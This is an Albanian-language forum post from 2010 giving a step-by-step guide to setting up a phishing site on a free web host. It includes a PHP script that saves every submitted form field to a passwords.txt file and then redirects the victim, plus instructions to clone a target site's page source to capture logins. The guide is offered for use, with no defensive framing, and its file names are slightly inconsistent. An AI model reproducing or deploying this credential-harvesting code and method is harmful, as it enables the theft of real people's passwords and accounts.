pishing web sait

Shko poshtë

pishing web sait

Mesazh  EliTe Crew prej Sun Jun 13, 2010 1:20 pm

shkoni tek site http://www.700megs.com. dhe krijoni nje acaunt pra sing up
me pas shkoni tek file managent dhe fshini filen me emrin index.htm
krijoni nje file tjter me emrin write.php dhe beji copy paste kesaj

<?php
header("Location: http://RANDOM");
$handle = fopen("passwords.txt", "a");
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

me pas bejeni save

me pas krijoni nje file tjter me emrin index.html
dhe faqes qe doni ti beni phishing beji view source dhe copy paste ne tekst
me pas save

me pas krijoni nje file me emer passwordfile.txt me tekst bosh dhe u be

me pas adresa juaj e phishing do te jete
http://www.yourdomain.700megs.com/passwordfile.txt

EliTe Crew

Numri i postimeve : 158
Join date : 13/06/2010
Age : 26
Location : united cracker group

Shiko profilin e anëtarit

Mbrapsht në krye Shko poshtë

Mbrapsht në krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti përgjigjeni temave të këtij forumi